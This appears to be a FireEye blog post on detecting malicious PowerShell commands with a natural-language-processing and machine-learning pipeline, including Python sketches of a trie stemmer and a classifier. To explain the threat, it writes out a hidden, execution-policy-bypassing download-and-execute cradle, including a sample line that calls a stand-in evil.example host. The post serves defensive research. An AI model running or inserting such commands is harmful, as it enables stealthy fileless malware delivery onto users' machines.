Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils stealthy fileless network access and remote content execution! (A short decoding sketch follows the list below.)

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).
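
Since the figures are not reproduced here, the following Python sketch shows what the decoding step looks like in practice. PowerShell's -EncodedCommand flag expects the Base64 encoding of UTF-16LE text, so an analyst (or a detection pipeline) can recover the hidden command in one step; the embedded download command below is a defanged, hypothetical stand-in for the sample in the figures:

    import base64

    # Defanged stand-in for the hidden payload command from Figure 4.
    hidden = "IEX (new-object net.webclient).downloadstring('http://<url>')"

    # -encodedcommand expects Base64 over UTF-16LE text.
    encoded = base64.b64encode(hidden.encode("utf-16-le")).decode("ascii")

    # The reverse step an analyst or detection engine performs:
    decoded = base64.b64decode(encoded).decode("utf-16-le")
    assert decoded == hidden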

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonymy, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.
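
A minimal Python version of such a trie-based stemmer might look like the following; the class layout and token set are illustrative assumptions, not the production implementation described above:

    class TrieStemmer:
        # Maps every stored variant of a token to one canonical stem by
        # walking the trie character by character.

        def __init__(self):
            self.root = {}

        def add(self, word, stem):
            node = self.root
            for ch in word.lower():
                node = node.setdefault(ch, {})
            node["$stem"] = stem

        def stem(self, token):
            node, best = self.root, token
            for ch in token.lower():
                if ch not in node:
                    break
                node = node[ch]
                best = node.get("$stem", best)
            return best

    stemmer = TrieStemmer()
    for variant in ("nol", "nolo", "nologo"):
        stemmer.add(variant, "nologo")
    assert stemmer.stem("NOLO") == "nologo"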


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed comprises the following key modules:

  • Decoder: Detect and decode any encoded text
  • Named Entity Recognition (NER): Detect and recognize any entities such as IP, URL, Email, Registry key, etc.
  • Tokenizer: Tokenize the PowerShell command into a list of tokens
  • Stemmer: Stem tokens into semantically identical tokens, using a trie
  • Vocabulary Vectorizer: Vectorize the list of tokens into a machine learning friendly format
  • Supervised classifier: Binary classification algorithms, including Kernel Support Vector Machine, Gradient Boosted Trees and Deep Neural Networks
  • Reasoning: The explanation of why the prediction was made; enables analysts to validate predictions

The following are the key steps when streaming the aforementioned example through the NLP pipeline (a toy end-to-end sketch in Python follows the list):

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model
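
Stitched together, a toy end-to-end version of these steps could be expressed with scikit-learn roughly as follows; the entity regex, the four-command corpus and the model choice are illustrative placeholders, not FireEye's production components:

    import re
    from sklearn.ensemble import GradientBoostingClassifier
    from sklearn.feature_extraction.text import CountVectorizer
    from sklearn.pipeline import make_pipeline

    def normalize(command):
        # NER-style step: collapse concrete indicators into generic entity tokens.
        return re.sub(r"https?://\S+", "ENTITY_URL", command, flags=re.I).lower()

    # Toy labeled corpus: 1 = malicious, 0 = benign.
    commands = [
        "iex (new-object net.webclient).downloadstring('http://evil.example/a')",
        "powershell -noprofile -noni -w hidden -exec bypass -encodedcommand AAAA",
        "get-childitem c:\\users | sort-object length",
        "get-process | where-object cpu -gt 100",
    ]
    labels = [1, 1, 0, 0]

    model = make_pipeline(
        CountVectorizer(preprocessor=normalize, token_pattern=r"[\w\-\$\.]+"),
        GradientBoostingClassifier(),
    )
    model.fit(commands, labels)

    # Probability that an unseen command is malicious:
    print(model.predict_proba(["iex (new-object net.webclient).downloadstring('http://x')"]))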


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures but were detected by our machine learning model with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.